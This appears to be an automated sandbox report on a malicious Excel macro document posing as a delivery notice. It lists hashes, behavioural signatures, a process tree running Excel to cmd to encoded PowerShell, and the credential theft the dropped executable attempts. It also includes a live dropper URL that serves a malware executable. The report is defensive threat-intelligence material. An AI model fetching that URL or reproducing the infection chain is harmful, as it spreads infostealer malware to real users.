Analysis

  • max time kernel: 123s
  • max time network: 149s
  • platform: windows10_x64
  • resource: win10-en-20211014
  • submitted: 21-10-2021 05:55

General

  • Target: delivery noticefNQSE5.xlsm
  • Size: 389KB
  • MD5: cf4c3f1e0953167d484fb25ac961db42
  • SHA1: d946a7e52728e50d6013a65bc0eb008b42b83787
  • SHA256: 81dc79b21940ab4d94fb07cdfc337eaf3879fc4a7ad4eb71751f3c0eaa41061b
  • SHA512: d83bbff65e3d4d005b405c15708fb41967049ea7dcb059db2ea4b9b4f82a96c490088a91928f85640942ed37a7ff07e5d6391d98ad2c714bb9ab9db2a1331a8e

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs (exe.dropper): http://3.64.251.139/vr/r/QA4ty2uUkTCD2tfNQSE5.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Deletes itself 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\delivery noticefNQSE5.xlsm"
    1⤵
    • Deletes itself
    • Checks processor information in registry
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Qtkkhrqfym.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc <encoded command elided>
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3796
        • C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
          "C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1916
          • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
            C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:700

MITRE ATT&CK Matrix (ATT&CK v6)

  • Persistence: Registry Run Keys / Startup Folder (T1060), 1
  • Defense Evasion: Modify Registry (T1112), 1
  • Credential Access: Credentials in Files (T1081), 3
  • Discovery: Query Registry (T1012), 2; System Information Discovery (T1082), 2
  • Collection: Data from Local System (T1005), 3; Email Collection (T1114), 1

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qxwhhwxztatczrimdt.exe.log
    MD5: 605f809fab8c19729d39d075f7ffdb53
    SHA1: c546f877c9bd53563174a90312a8337fdfc5fdd9
    SHA256: 6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556
    SHA512: 82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

  • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
    MD5: 1eada844f6d267f4451b9ffa8eba6624
    SHA1: 11144faece06eb2b3c9c7e19ac3c170b66a351f7
    SHA256: 49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e
    SHA512: 1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
    MD5: 1eada844f6d267f4451b9ffa8eba6624
    SHA1: 11144faece06eb2b3c9c7e19ac3c170b66a351f7
    SHA256: 49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e
    SHA512: 1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

  • C:\Users\Admin\Documents\Qtkkhrqfym.bat
    MD5: 57cc9b0d215088ba8b5d63024605da81
    SHA1: cdc02772f2d7ecacbb86ad63e67b1726b36eafc6
    SHA256: ea7db683263f7447dec974e52fe719b6ed0db751e122d53f57cdd0482d644f70
    SHA512: bc087ab0e497686213f9a2a03a447009a798936ee8d80d4f652edf8974e0940a20445db82802581acf3b7865c8a00013173f55db365daf2aa31c28bd43bf04e3
